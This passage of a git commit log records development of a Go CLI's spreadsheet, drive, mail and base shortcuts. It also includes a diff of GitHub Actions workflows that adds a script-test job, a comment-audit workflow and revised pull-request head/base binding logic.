   shape mismatch. The dry-run now calls sheetSelectorForToolInput so
   the body matches Execute.

2. isDateNumberFormat used a simple `strings.ContainsRune(_, 'y')` so
   number formats like "JPY #,##0" (a currency prefix that happens to
   contain a lone 'Y') were misread as date formats — round-tripping
   integer cells out as ISO dates. The detector is now token-aware:
   it skips quoted "...", `\\x`-escaped, and `[...]` bracket sections,
   and only fires on an unescaped `yy` (a real Excel year token).

3. sheetCreateDims sized new append-mode sheets by `headerOn(s)` only,
   but writeSheetData forces a header on empty append sheets when
   Header == nil. Near 50000 rows / 200 cols this created the sheet one
   row short and the follow-up set_cell_range bounced off the backend
   ceiling. Size now matches the forced-header logic exactly.

4. tableGetTargets fallback paths (read-failure / selector mismatch on
   --sheet-id) returned a target with name="" — already corrected for
   --sheet-id structure-success path in 086876d2, but the structure-
   failure fallback still left it empty. Use the id as the name there
   too so the +table-get → +table-put round-trip never breaks on a
   nameless sheet.

End-to-end verified against a real spreadsheet:
- table-get --dry-run with --sheet-name / --sheet-id both render the
  selector field in the get_cell_ranges body
- A real round-trip (typed put → get) preserves dtypes + formats

* fix(sheets): bound --dataframe memory use with byte / row / column caps

readDataframeBytes used to read the whole Arrow file unbounded — a
stdin / file > 1 GiB would OOM the CLI long before the backend
per-sheet ceilings kicked in. decodeArrowToSheet then materialized
every record into [][]interface{} regardless of size.

Three caps now match the backend's per-sheet hard ceilings:
- byte cap: 256 MiB (covers worst-case 200×50000 cells × ~25 B Arrow
  overhead). File path pre-Stat()s before opening; both file and stdin
  paths read through io.LimitReader so an oversized input is rejected
  without allocating the full payload.
- column cap: 200, checked at schema-decode time before allocating any
  per-column slices.
- row cap: 50000, checked during record-batch iteration so a 1M-row
  Arrow file is rejected mid-stream instead of fully decoding first.

End-to-end verified against PPE — a 257 MiB file is rejected at file-
Stat with a typed validation error before any read happens.

* fix(drive): wrap +export ctx cancellation/deadline as typed errs.NetworkError

The poll loop in RunExport returned ctx.Err() directly in two places —
on the inter-attempt sleep cancel and on the pre-attempt deadline check.
That let context.Canceled / context.DeadlineExceeded escape as untyped
errors at the cobra layer, bypassing the typed-error contract every
other failure path already honors.

Add wrapExportContextErr that maps both into errs.NewNetworkError with
SubtypeNetworkTransport / SubtypeNetworkTimeout respectively and
preserves the cause via .WithCause(err), so callers can still
errors.Is(err, context.Canceled) downstream.

CR-flagged at drive_export.go:229 / :234.

* ci(license): narrow Apache Arrow workaround with a follow-up assertion

The dependency-license check still has to --ignore Apache Arrow wholesale
because go-licenses' classifier parses its LICENSE.txt as a single license
and mis-reports the module as LicenseRef-C-Ares / Unknown (Arrow inlines
the c-ares 3rdparty notice alongside its own Apache-2.0). Re-classifying
on our side isn't possible without changing go-licenses itself.

The CR concern was that --ignore is too wide — a future Arrow re-license
or new inlined dep would silently sail through. Add a follow-up step that
re-checks Arrow's LICENSE.txt independently: it must still open with
"Apache License" AND must still inline the c-ares 3rdparty notice (the
two facts that make the --ignore safe today). If either invariant breaks,
CI fails here and forces a human to re-evaluate the ignore.

Verified locally — both assertions pass against the current pinned
Arrow v17.

* sync(sheets): pick up +table-put payload-shape doc corrections from spec

Mirror of the sheet-skill-spec change that fixes three places teaching
an invalid +table-put payload shape — the typed protocol only has
columns / data / dtypes / formats (no formula field) and must always
be wrapped in an outer {"sheets":[...]} envelope. write-cells and the
SKILL.md decision table previously used the wrong field names (type /
format) and pointed users at +table-put for formula writes, which the
shortcut can't actually accept.

Synced from upstream canonical via generate:cli + sync:cli.

* test(sheets/e2e): add E2E coverage for new shortcuts + typed workbook-create

AGENTS.md requires a dry-run E2E for every new shortcut and a live E2E
for new flows. Three new files cover the four shortcuts this branch
adds or materially changes:

- sheets_gridline_dryrun_test.go — pins +sheet-show-gridline /
  +sheet-hide-gridline as a single modify_workbook_structure call with
  the right operation name (show_gridline / hide_gridline) and
  sheet_id, so an op-name typo would trip CI before any live run.

- sheets_workbook_import_dryrun_test.go — pins +workbook-import as a
  two-step plan (drive media upload + drive import-task create) with
  the doc type hard-coded to "sheet" — the wrapper's whole reason for
  existing on top of generic drive +import. --name reaches file_name
  on the wire; file_extension is sniffed from the local file.

- sheets_table_put_typed_workflow_test.go — two live workflows running
  against a freshly created spreadsheet. The first runs the full
  typed +table-put → +table-get round-trip (date / numeric / object
  columns with custom number_format) and asserts the dtype + format
  contract holds end-to-end. The second exercises the typed
  +workbook-create --sheets path: create + write in one shortcut, the
  payload sheet name adopts the workbook's default sheet (no empty
  "Sheet1" left behind), and the typed contract still survives the
  read-back.

End-to-end verified locally (user identity): typed put round-trips
preserve dtypes (date → datetime64[ns], numeric → float64, object →
object) + formats verbatim; workbook-create adopts the named sheet as
the first sheet with the same typed shape intact.

* sync(sheets): pick up sheets_df.py — pandas ↔ JSON skill script from spec

Mirror of the sheet-skill-spec change that adds a DataFrame ↔ JSON
bridge as a skill-bundled Python script instead of inside the CLI
binary. Per PR #1355 review (docx NcmxdRo2yoZ4OXxoMUZcxRZ7nHd, §4.2):
keep the CLI a thin JSON/REST client; pandas / Arrow editing lives in
the caller's Python process. Synced from canonical via generate:cli +
sync:cli.

- skills/lark-sheets/scripts/sheets_df.py (new): pandas DataFrame ↔
  one sheet, .parquet / .feather / .arrow / .csv / .json. Shells out to
  `+table-put` / `+table-get` over typed JSON — no CLI changes.
- SKILL.md decision tree + write-cells.md +table-put section: explicit
  pointers so pandas users land on the script instead of hand-rolling
  the `--sheets` payload.

End-to-end verified against PPE: 3-row DataFrame (datetime / float /
object) round-trips parquet → script put → real sheet → script get →
parquet with dtypes preserved.

* Revert "sync(sheets): pick up sheets_df.py — pandas ↔ JSON skill script from spec"

This reverts commit 2964983b92.

* sync(sheets): pick up sheets_df.py + doc DRY cleanup from spec

Mirror of the sheet-skill-spec change that ships a 32-line helper-only
sheets_df.py (df_to_sheet + sheet_to_df) and removes the corresponding
inline `def` blocks from three reference docs.

- skills/lark-sheets/scripts/sheets_df.py (new): pandas DataFrame ↔
  one +table-put / +table-get sheet, importable as a library. Same
  helper pair the docs already taught, lifted out of the prose so
  callers can `from sheets_df import df_to_sheet, sheet_to_df`.
- lark-sheets-write-cells.md / lark-sheets-read-data.md /
  lark-sheets-workbook.md: drop the inline helper definitions; keep
  the usage examples (single/multi-sheet, round-trip) and switch them
  to import-from-script. workbook reference's +workbook-create
  --sheets section now points pandas users at the helper directly
  (was previously a textual reference back to write-cells).

End-to-end verified against PPE (--as user):
- +workbook-create with df_to_sheet for three sheets (income / balance
  / cashflow): create ok, dtypes (datetime64[ns] / float64) + formats
  (#,##0 / 0.0% / yyyy-mm-dd) survive on read-back through sheet_to_df.
- read → pandas mutate → write-back round-trip preserves both data
  and formats.

* chore: drop accidentally-committed __pycache__/ and gitignore .pyc

The previous commit (5fac9c39) shipped sheets_df.py and inadvertently
included its `__pycache__/sheets_df.cpython-312.pyc` — local Python
import created the bytecode cache during PPE round-trip verification and
`git add skills/lark-sheets/` swept it in.

Remove the pyc and add Python bytecode patterns to .gitignore so the
skill-bundled helper scripts don't pull cache files into future commits.

* refactor(sheets): drop --dataframe / --dataframe-out + apache/arrow dep

Per the design review at NcmxdRo2yoZ4OXxoMUZcxRZ7nHd, the Arrow IPC binary
input/output channel adds a heavy columnar runtime to the CLI for no new
capability — the typed JSON --sheets path already covers everything, and
the column-major / zero-copy advantages collapse the moment the CLI re-
encodes into the row-oriented sheets OpenAPI JSON body. Removing it also
lets us drop the `--ignore github.com/apache/arrow/go/v17` license-check
escape hatch.

Deleted:
- shortcuts/sheets/lark_sheet_dataframe.go (+ test)
- --dataframe branches in +table-put / +workbook-create
- --dataframe-out branch in +table-get
- StdinConsumed / MarkStdinConsumed exported methods (the binary stdin
  reader was the only out-of-band consumer); internal stdinConsumed
  guard against duplicate `-` input flags stays
- apache/arrow/go/v17 + transitive deps via `go mod tidy`
- CI go-licenses --ignore for arrow and the LICENSE.txt assertion step
- --dataframe / --dataframe-out coverage in skill references

Pandas users keep the round-trip via the existing skill script
skills/lark-sheets/scripts/sheets_df.py over the JSON path.

The full pre-removal state is preserved on branch feat/sheets-arrow-stash.

Upstream sheet-skill-spec follow-up: the two flag rows in the canonical
spec + base table tblV2F6fqIjyCFQW must also be dropped so the next sync
does not re-add them.

* sync(sheets): pick up --sheets one-liner fix from spec

Mirrors sheet-skill-spec 5562f83. The +table-put / +workbook-create
--sheets flag descriptions (and the --print-schema description on the
sheets array) now point at the existing df_to_sheet helper instead of
the previous misleading one-liner that produced a dict missing the
outer {"sheets":[...]} envelope and the per-sheet `name`. Agents that
copy-paste the description verbatim now build a valid payload.

Auto-synced via spec's generate:cli + sync:consumers; go generate
./shortcuts/sheets/... regenerated flag_defs_gen.go so its embedded
flagDefs stays byte-equal to data/flag-defs.json.

* test(sheets/e2e): close E2E coverage gaps for newly added shortcuts

AGENTS.md requires both dry-run and live E2E for every newly registered
shortcut, and behavior-changing refactors need at least the matching
half. Three gaps remained on feat/lark-sheets-develop:

- +sheet-show-gridline / +sheet-hide-gridline (new): only dry-run E2E.
  Add sheets_gridline_workflow_test.go — create a real spreadsheet,
  toggle hide then show against a live sub-sheet, assert ok=true on
  both (gridline state is write-only — there is no read-back field on
  +sheet-info / +workbook-info — so a successful envelope is the
  meaningful signal; the dry-run E2E already pins the wire shape).

- +workbook-import (new): only dry-run E2E. Add
  sheets_workbook_import_workflow_test.go — write a local CSV, run
  the full upload → create-task → poll, assert ready=true with a
  sheet token, +info confirms the imported workbook is reachable,
  cleanup deletes the spreadsheet.

- +workbook-export refactor (no-download default changed): had live
  E2E but no dry-run E2E in tests/cli_e2e/. Add
  sheets_workbook_export_dryrun_test.go — pin the three sheet-
  specific differences vs drive +export: type=sheet hard-coded,
  csv mode routes --sheet-id onto sub_id (xlsx mode omits it), and
  --output-path maps onto the dry-run plan's top-level output_dir.
  Also pins the csv-without-sheet-id validation error.

* refactor(sheets): unify workbookCreatedButFillFailed with OutPartialFailure

Three "made it halfway and stopped" exits in the sheets domain previously
disagreed on shape, which made the post-failure recovery flow hard for
agents to predict from one command to another:

- +table-put partial write           → exit 1, stdout ok:false envelope
- +table-put zero-sheet write        → exit 1, stderr api/server_error
- +workbook-create create-but-fill   → exit 2, stderr validation/failed_precondition

OutPartialFailure exists exactly for "the side effect landed but the
follow-up didn't" — it stamps an ok:false result envelope on stdout
(carrying the state the caller needs to recover) and returns the bare
partial-failure exit signal. The workbook-create fill-failure path was
the odd one out: it surfaced as a typed failed_precondition error on
stderr, which agents couldn't tell apart from a plain validation refusal
even though the spreadsheet really did exist and a retry / cleanup was
possible.

Migrate workbookCreatedButFillFailed onto OutPartialFailure so the four
call sites in +workbook-create's Execute (sheet-resolve failure, initial
fill failure, style-only resolve failure, style-only apply failure) emit
the same envelope shape +table-put's partial write does:

  {
    "ok": false,
    "data": {
      "spreadsheet_token": "shtNEW",
      "reason": "spreadsheet shtNEW created but initial fill failed",
      "hint":   "the spreadsheet exists; retry the fill … or delete it",
      "cause":  {"category": "...", "subtype": "...", "message": "..."}
    }
  }

The inner failure's typed problem (category / subtype / message) is
flattened into the `cause` field so agents stay diagnosable from the JSON
envelope alone, instead of having to errors.Unwrap a Go error.

Updated TestExecute_WorkbookCreate_FillFailureKeepsToken to assert the
new shape (ok:false envelope on stdout, *output.PartialFailureError exit
signal, structured cause carrying the underlying invalid_response
subtype) — preserving the original test intent (token must survive for
recovery; inner cause must stay diagnosable) under the new contract.

* chore(sheets): three review nits — WithCause + stale comment + unexport

- shortcuts/sheets/flag_schema_validate.go:106 — composite-JSON shape
  validation was wrapping vErr's message into a typed sheets validation
  error without preserving vErr as the typed cause; add the missing
  .WithCause(vErr) so errors.Unwrap and ProblemOf still find the
  underlying validator error (matches every other typed-error chain
  helper in the file).

- shortcuts/sheets/lark_sheet_batch_update.go:92 — comment claimed
  batchUpdateInput returns "FlagErrorf-typed errors", but FlagErrorf no
  longer exists (the typed-error migration replaced it with
  common.ValidationErrorf / errs.ValidationError); update the comment
  to reflect what is actually returned.

- shortcuts/drive/drive_export.go:121 — drop the ValidateExport public
  alias and rename to validateExport. sheets +workbook-export reuses
  RunExport / PlanExportDryRun from this package but inlines its own
  (sheet-specific) Validate, so there is no cross-package call site —
  ValidateExport was a misleading sibling of the genuinely-shared
  ValidateImport. Comment added to record the asymmetry so future
  readers do not export it back.

* chore(deps): drop stale indirect bumps left by the arrow removal

The earlier --dataframe / --dataframe-out + apache/arrow/go/v17 removal
deleted the arrow consumer but left two indirect lines in go.mod pinned
to the versions arrow had pulled in:

  - github.com/kr/text                   v0.2.0
  - golang.org/x/exp  v0.0.0-20240222234643-814bf88cf225

With arrow gone, larksuite/cli was the only requirer of those exact
versions; every real consumer needs lower ones (kr/pretty wants
kr/text v0.1.0; charmbracelet/huh wants x/exp …20231006; xo/terminfo
wants x/exp …20220909). Removing the two indirect lines and running
`go mod tidy` lets MVS pick the real-consumer versions and drops the
explicit indirect entries entirely — go.mod net-diff against main is
now zero for this branch.

Verified locally: go build ./...; go test ./shortcuts/sheets/...
./shortcuts/drive/... ./shortcuts/common/... ./internal/auth/...
./cmd/auth/... — all green.

---------

Co-authored-by: zhengzhijie <zhengzhijie.j@bytedance.com>
Co-authored-by: Chenweifeng-bd <chenweifeng.1534@bytedance.com>
2026-06-25 10:48:13 +08:00
ZEden0
898e6d4b3b fix: prefix docs resource shortcuts (#1564) 2026-06-24 22:39:57 +08:00
zgz2048
7df37ed715 feat(base): Add Base URL and title resolve shortcuts (#1338)
* feat(base): add URL and title resolve shortcuts

* docs: clarify base coordinate resolution

* fix(base): address resolve shortcut ci

* fix(base): format resolved record share hint

* fix(base): simplify record share hint data

* fix(base): use field ids in resolved record data

* fix(base): guide record share resolve to update record

* fix(base): include record upsert example in resolve hint

* fix(base): reject add-record urls in resolver

* fix(base): validate title resolve query length

* fix(base): hide resolve alias flags from help

* fix(base): prefer title flag for title resolve

* docs(base): clarify token resolution wording
2026-06-24 22:26:29 +08:00
91-enjoy
3f9ace8af5 feat: support card action trigger (#1528)
Add support for card.action.trigger, the event fired when a user interacts with an
interactive card (button click, form submit, dropdown, checkbox, input, date picker, etc.).
The handler flattens the V2 envelope into a structured output and auto-fetches the original
card content (card_content) at consume time, enabling a complete read-then-update workflow
without extra API calls.
2026-06-24 22:00:08 +08:00
Zhang-986
b3514e5519 fix(binding): skip unix mode audit on windows (#1525) 2026-06-24 20:54:24 +08:00
ILUO
b46e60c156 feat: add task event consumer (#1510)
* feat: add task event consumer

* fix: address task event review feedback

* feat: remove legacy task event subscription shortcut

* test: strengthen task preconsume error assertions
2026-06-24 17:32:02 +08:00
chenxingtong-bytedance
d71bab0061 docs(im): clarify audio message opus requirement (#1271)
Fix IM shortcut behavior for audio messages to match the Feishu/Lark file upload API: --audio is for voice messages and supports only Opus audio. Non-Opus local/URL inputs such as mp3 and wav are now rejected before upload with an actionable typed validation error. Users can still send those files as attachments with --file
2026-06-24 14:41:54 +08:00
liangshuo-1
d11a6e97a4 chore: release v1.0.57 (#1553) 2026-06-23 20:43:41 +08:00
raistlin042
e4248d1154 fix: harden lark-apps +init/+html-publish and skill guidance (#1517)
* fix: reject +init into a different app's project directory

* fix: reject single HTML files larger than 10MB in +html-publish

* docs: clarify publish visibility, domain routing, and role/permission boundary
2026-06-23 20:18:10 +08:00
fangshuyu-768
cb54bea00d docs(lark-doc): refine rich block, path, and block ID guidance (#1508) 2026-06-23 18:27:36 +08:00
hanshaoshuai
036e5799d3 fix(ci): bind semantic review to workflow run head 2026-06-23 18:21:29 +08:00
xukuncx
c4106f50b2 fix(mail): resolve folder/label filter once per +triage list call (#1512)
buildListParams used to re-call resolveFolderID / resolveFolderName (and the
label counterparts) on every list page to assemble folder_id / label_id.
Because resolveListFilter already resolves the filter once before the
pagination loop, the second pass hit the folders/labels list API again on
every page — 1 + page_count calls total, which easily trips rate limits.

buildListParams now only assembles API params from the already-resolved
FolderID / LabelID produced by resolveListFilter; it no longer resolves
names or aliases. The default folder_id=INBOX is still applied when no
explicit filter is present, and only overridden when the caller supplied a
canonical folder ID. The runtime / mailboxID / dryRun parameters are kept
for signature stability (resolveListFilter and buildSearchParams share the
same call shape).

Adds TestMailTriageCustomFolderResolvesOnceAcrossListPages: a custom-folder
filter forced across two messages-list pages, with a non-reusable folders
list stub so any second folders API call fails the test. Updated the two
existing buildListParams alias tests to run resolveListFilter first, mirroring
the real DryRun/Execute call order.

sprint: S1

Co-authored-by: xukuncx <283114605+xukuncx@users.noreply.github.com>
2026-06-23 18:05:08 +08:00
liangshuo-1
736b131cdf fix(meta): backfill enum value descriptions from options (#1541) 2026-06-23 16:14:42 +08:00
arnold9672
5efaf65aec feat: surface search API notices (#1413)
* feat: surface search API notices

sa: safe
doc: none
cfg: none
test: unit test

* fix: surface search notices in default output

* docs: add search notice doc comments

* docs: expand search notice doc comments
2026-06-23 14:27:04 +08:00
linchao5102
0991da7446 fix: add missing CLI headers for git credential helper (#1539) 2026-06-23 14:25:26 +08:00
zgz2048
80bea45c6a feat: support base record comments (#1043)
* feat: support base record comments

* fix: tighten base comment validation

* fix: validate wiki base comment flags
2026-06-23 11:20:07 +08:00
bubbmon233
c775cb4360 docs(mail): trim lark-mail skill context (#1527) 2026-06-22 21:32:31 +08:00
577 changed files with 62744 additions and 4387 deletions

View File

@@ -5,6 +5,7 @@ on:
branches: [main]
pull_request:
branches: [main]
types: [opened, synchronize, reopened, edited]
workflow_dispatch:
permissions:
@@ -70,6 +71,7 @@ jobs:
- uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5
with:
fetch-depth: 0
persist-credentials: false
- uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6
with:
go-version-file: go.mod
@@ -87,6 +89,23 @@ jobs:
- name: Run errs/ lint guards (lintcheck)
run: go run -C lint . --changed-from "$QUALITY_GATE_CHANGED_FROM" ..
script-test:
needs: fast-gate
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5
with:
fetch-depth: 0
persist-credentials: false
- uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6
with:
go-version-file: go.mod
- uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4
with:
node-version: '22'
- name: Run script tests
run: make script-test
deterministic-gate:
needs: fast-gate
runs-on: ubuntu-latest
@@ -109,8 +128,28 @@ jobs:
env:
QUALITY_GATE_CHANGED_FROM: ${{ github.event.pull_request.base.sha || github.event.before || 'origin/main' }}
run: echo "QUALITY_GATE_CHANGED_FROM=$(bash scripts/resolve-changed-from.sh)" >> "$GITHUB_ENV"
- name: Write public content metadata
if: ${{ github.event_name == 'pull_request' }}
env:
PR_TITLE: ${{ github.event.pull_request.title }}
PR_BODY: ${{ github.event.pull_request.body }}
PR_BRANCH: ${{ github.head_ref }}
run: |
mkdir -p .tmp/quality-gate
python3 - <<'PY'
import json
import os
with open(".tmp/quality-gate/public-content-metadata.json", "w", encoding="utf-8") as f:
json.dump({
"title": os.environ.get("PR_TITLE", ""),
"body": os.environ.get("PR_BODY", ""),
"branch": os.environ.get("PR_BRANCH", ""),
}, f)
f.write("\n")
PY
- name: Run CLI deterministic gate
run: make quality-gate
run: PUBLIC_CONTENT_METADATA=.tmp/quality-gate/public-content-metadata.json make quality-gate
- name: Upload quality gate facts
if: ${{ always() && github.event_name == 'pull_request' }}
uses: actions/upload-artifact@ea165f8d65b6e75b540449e92b4886f43607fa02 # v4
@@ -220,7 +259,7 @@ jobs:
# ── Layer 3: E2E Gate ──────────────────────────────────────────────
e2e-dry-run:
needs: [unit-test, lint, deterministic-gate]
needs: [unit-test, lint, script-test, deterministic-gate]
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5
@@ -241,7 +280,7 @@ jobs:
run: go test -v -count=1 -timeout=5m ./tests/cli_e2e/... -run 'DryRun|Regression'
e2e-live:
needs: [unit-test, lint, deterministic-gate]
needs: [unit-test, lint, script-test, deterministic-gate]
if: ${{ github.event_name != 'pull_request' || !github.event.pull_request.head.repo.fork }}
runs-on: ubuntu-latest
permissions:
@@ -333,7 +372,7 @@ jobs:
# ── Results Gate (single required check for branch protection) ─────
results:
if: ${{ always() }}
needs: [fast-gate, unit-test, lint, deterministic-gate, coverage, deadcode, e2e-dry-run, e2e-live, security, license-header]
needs: [fast-gate, unit-test, lint, script-test, deterministic-gate, coverage, deadcode, e2e-dry-run, e2e-live, security, license-header]
runs-on: ubuntu-latest
steps:
- name: Evaluate results
@@ -345,6 +384,7 @@ jobs:
echo "| L1 | fast-gate | ${{ needs.fast-gate.result }} |" >> $GITHUB_STEP_SUMMARY
echo "| L2 | unit-test | ${{ needs.unit-test.result }} |" >> $GITHUB_STEP_SUMMARY
echo "| L2 | lint | ${{ needs.lint.result }} |" >> $GITHUB_STEP_SUMMARY
echo "| L2 | script-test | ${{ needs.script-test.result }} |" >> $GITHUB_STEP_SUMMARY
echo "| L2 | deterministic-gate | ${{ needs.deterministic-gate.result }} |" >> $GITHUB_STEP_SUMMARY
echo "| L2 | coverage | ${{ needs.coverage.result }} |" >> $GITHUB_STEP_SUMMARY
echo "| L2 | deadcode | ${{ needs.deadcode.result }} |" >> $GITHUB_STEP_SUMMARY
@@ -361,6 +401,7 @@ jobs:
"${{ needs.fast-gate.result }}" \
"${{ needs.unit-test.result }}" \
"${{ needs.lint.result }}" \
"${{ needs.script-test.result }}" \
"${{ needs.deterministic-gate.result }}" \
"${{ needs.coverage.result }}" \
"${{ needs.deadcode.result }}" \

28
.github/workflows/comment-audit.yml vendored Normal file
View File

@@ -0,0 +1,28 @@
name: Comment Audit
on:
issue_comment:
types: [created, edited]
pull_request_review:
types: [submitted, edited]
pull_request_review_comment:
types: [created, edited]
permissions:
contents: read
jobs:
public-content-comment-audit:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@93cb6efe18208431cddfb8368fd83d5badbf9bfd # v5
with:
persist-credentials: false
- uses: actions/setup-go@4a3601121dd01d1626a1e23e37211e3254c1c06c # v6
with:
go-version-file: go.mod
- name: Post-publication comment audit
run: |
mkdir -p .tmp/comment-audit
cp "$GITHUB_EVENT_PATH" .tmp/comment-audit/event.json
go run ./internal/qualitygate/cmd/comment-audit --event .tmp/comment-audit/event.json --kind "$GITHUB_EVENT_NAME"

View File

@@ -47,10 +47,13 @@ jobs:
throw new Error(`ambiguous workflow_run pull request bindings: ${runPRs.length}`);
}
let prNumber = Number(runPRs[0]?.number || 0);
let eventBaseSha = runPRs[0]?.base?.sha || "";
const eventBaseSha = runPRs[0]?.base?.sha || "";
const eventHeadSha = runPRs[0]?.head?.sha || "";
const targetHeadSha = eventHeadSha || run.head_sha;
const targetHeadSha = run.head_sha;
if (!/^[a-f0-9]{40}$/i.test(targetHeadSha)) throw new Error("invalid PR head sha");
if (eventHeadSha && eventHeadSha.toLowerCase() !== targetHeadSha.toLowerCase()) {
core.notice("PR quality summary using workflow_run head_sha because workflow_run pull request head differs from the CI run head");
}
const factsArtifactPattern = /^quality-gate-facts-([a-f0-9]{40})-([a-f0-9]{40})$/i;
const { data: artifactData } = await github.rest.actions.listWorkflowRunArtifacts({
@@ -71,11 +74,11 @@ jobs:
if (artifactHeadSha.toLowerCase() !== targetHeadSha.toLowerCase()) {
artifactError = "facts artifact head sha does not match verified PR head sha";
factsArtifactName = "";
} else if (eventBaseSha && parsedBaseSha.toLowerCase() !== eventBaseSha.toLowerCase()) {
artifactError = "facts artifact base sha does not match workflow_run pull request base sha";
factsArtifactName = "";
} else {
artifactBaseSha = parsedBaseSha;
if (eventBaseSha && parsedBaseSha.toLowerCase() !== eventBaseSha.toLowerCase()) {
core.notice("PR quality summary using facts artifact base because workflow_run pull request base differs from the CI facts artifact base");
}
}
}
if (!prNumber) {
@@ -85,31 +88,44 @@ jobs:
commit_sha: targetHeadSha,
});
const candidatePRs = associatedPRs.filter((candidate) =>
candidate.state === "open" &&
candidate.base?.repo?.id === context.payload.repository.id &&
candidate.head?.sha === targetHeadSha
);
if (candidatePRs.length > 1) {
throw new Error(`ambiguous open PRs for workflow_run head ${targetHeadSha}: ${candidatePRs.length}`);
const openCandidatePRs = candidatePRs.filter((candidate) => candidate.state === "open");
if (openCandidatePRs.length > 1) {
throw new Error(`ambiguous open PRs for workflow_run head ${targetHeadSha}: ${openCandidatePRs.length}`);
}
if (candidatePRs.length === 1) {
prNumber = candidatePRs[0].number;
if (openCandidatePRs.length === 1) {
prNumber = openCandidatePRs[0].number;
} else if (candidatePRs.length > 0) {
core.notice("PR quality summary skipped: workflow_run target PR is no longer open");
core.setOutput("stale", "true");
return;
}
}
if (!prNumber) {
const candidatePRs = await github.paginate(github.rest.pulls.list, {
owner: context.repo.owner,
repo: context.repo.repo,
state: "open",
state: "all",
per_page: 100,
}).then((prs) => prs.filter((candidate) =>
candidate.base?.repo?.id === context.payload.repository.id &&
candidate.head?.sha === targetHeadSha
));
if (candidatePRs.length !== 1) {
const openCandidatePRs = candidatePRs.filter((candidate) => candidate.state === "open");
if (openCandidatePRs.length > 1) {
throw new Error(`ambiguous open PRs from pull list fallback for workflow_run head ${targetHeadSha}: ${openCandidatePRs.length}`);
}
if (openCandidatePRs.length === 1) {
prNumber = openCandidatePRs[0].number;
} else if (candidatePRs.length > 0) {
core.notice("PR quality summary skipped: workflow_run target PR is no longer open");
core.setOutput("stale", "true");
return;
} else {
throw new Error(`expected one open PR from pull list fallback for workflow_run head ${targetHeadSha}, got ${candidatePRs.length}`);
}
prNumber = candidatePRs[0].number;
}
if (!Number.isInteger(prNumber) || prNumber <= 0) throw new Error("missing pull request binding");
const { data: pr } = await github.rest.pulls.get({
@@ -118,12 +134,17 @@ jobs:
pull_number: prNumber,
});
if (pr.base.repo.id !== context.payload.repository.id) throw new Error("PR base repo mismatch");
if (pr.state !== "open") {
core.notice("PR quality summary skipped: workflow_run target PR is no longer open");
core.setOutput("stale", "true");
return;
}
if (pr.head.sha !== targetHeadSha) {
core.notice("PR quality summary skipped: workflow_run is stale for this PR head");
core.setOutput("stale", "true");
return;
}
const baseSha = eventBaseSha || artifactBaseSha || pr.base.sha;
const baseSha = artifactBaseSha || eventBaseSha || pr.base.sha;
if (!/^[a-f0-9]{40}$/i.test(baseSha)) throw new Error("invalid PR base sha");
if ((eventBaseSha || artifactBaseSha) && pr.base.sha !== baseSha) {
core.notice("PR quality summary skipped: workflow_run is stale for this PR base");
@@ -255,10 +276,13 @@ jobs:
throw new Error(`ambiguous workflow_run pull request bindings: ${runPRs.length}`);
}
let prNumber = Number(runPRs[0]?.number || 0);
let eventBaseSha = runPRs[0]?.base?.sha || "";
const eventBaseSha = runPRs[0]?.base?.sha || "";
const eventHeadSha = runPRs[0]?.head?.sha || "";
const targetHeadSha = eventHeadSha || run.head_sha;
const targetHeadSha = run.head_sha;
if (!/^[a-f0-9]{40}$/i.test(targetHeadSha)) throw new Error("invalid PR head sha");
if (eventHeadSha && eventHeadSha.toLowerCase() !== targetHeadSha.toLowerCase()) {
core.notice("semantic review using workflow_run head_sha because workflow_run pull request head differs from the CI run head");
}
const factsArtifactPattern = /^quality-gate-facts-([a-f0-9]{40})-([a-f0-9]{40})$/i;
const { data: artifactData } = await github.rest.actions.listWorkflowRunArtifacts({
@@ -279,11 +303,11 @@ jobs:
if (artifactHeadSha.toLowerCase() !== targetHeadSha.toLowerCase()) {
artifactError = "facts artifact head sha does not match verified PR head sha";
factsArtifactName = "";
} else if (eventBaseSha && parsedBaseSha.toLowerCase() !== eventBaseSha.toLowerCase()) {
artifactError = "facts artifact base sha does not match workflow_run pull request base sha";
factsArtifactName = "";
} else {
artifactBaseSha = parsedBaseSha;
if (eventBaseSha && parsedBaseSha.toLowerCase() !== eventBaseSha.toLowerCase()) {
core.notice("semantic review using facts artifact base because workflow_run pull request base differs from the CI facts artifact base");
}
}
}
if (!prNumber) {
@@ -293,31 +317,44 @@ jobs:
commit_sha: targetHeadSha,
});
const candidatePRs = associatedPRs.filter((candidate) =>
candidate.state === "open" &&
candidate.base?.repo?.id === context.payload.repository.id &&
candidate.head?.sha === targetHeadSha
);
if (candidatePRs.length > 1) {
throw new Error(`ambiguous open PRs for workflow_run head ${targetHeadSha}: ${candidatePRs.length}`);
const openCandidatePRs = candidatePRs.filter((candidate) => candidate.state === "open");
if (openCandidatePRs.length > 1) {
throw new Error(`ambiguous open PRs for workflow_run head ${targetHeadSha}: ${openCandidatePRs.length}`);
}
if (candidatePRs.length === 1) {
prNumber = candidatePRs[0].number;
if (openCandidatePRs.length === 1) {
prNumber = openCandidatePRs[0].number;
} else if (candidatePRs.length > 0) {
core.notice("semantic review skipped: workflow_run target PR is no longer open");
core.setOutput("stale", "true");
return;
}
}
if (!prNumber) {
const candidatePRs = await github.paginate(github.rest.pulls.list, {
owner: context.repo.owner,
repo: context.repo.repo,
state: "open",
state: "all",
per_page: 100,
}).then((prs) => prs.filter((candidate) =>
candidate.base?.repo?.id === context.payload.repository.id &&
candidate.head?.sha === targetHeadSha
));
if (candidatePRs.length !== 1) {
const openCandidatePRs = candidatePRs.filter((candidate) => candidate.state === "open");
if (openCandidatePRs.length > 1) {
throw new Error(`ambiguous open PRs from pull list fallback for workflow_run head ${targetHeadSha}: ${openCandidatePRs.length}`);
}
if (openCandidatePRs.length === 1) {
prNumber = openCandidatePRs[0].number;
} else if (candidatePRs.length > 0) {
core.notice("semantic review skipped: workflow_run target PR is no longer open");
core.setOutput("stale", "true");
return;
} else {
throw new Error(`expected one open PR from pull list fallback for workflow_run head ${targetHeadSha}, got ${candidatePRs.length}`);
}
prNumber = candidatePRs[0].number;
}
if (!Number.isInteger(prNumber) || prNumber <= 0) throw new Error("missing pull request binding");
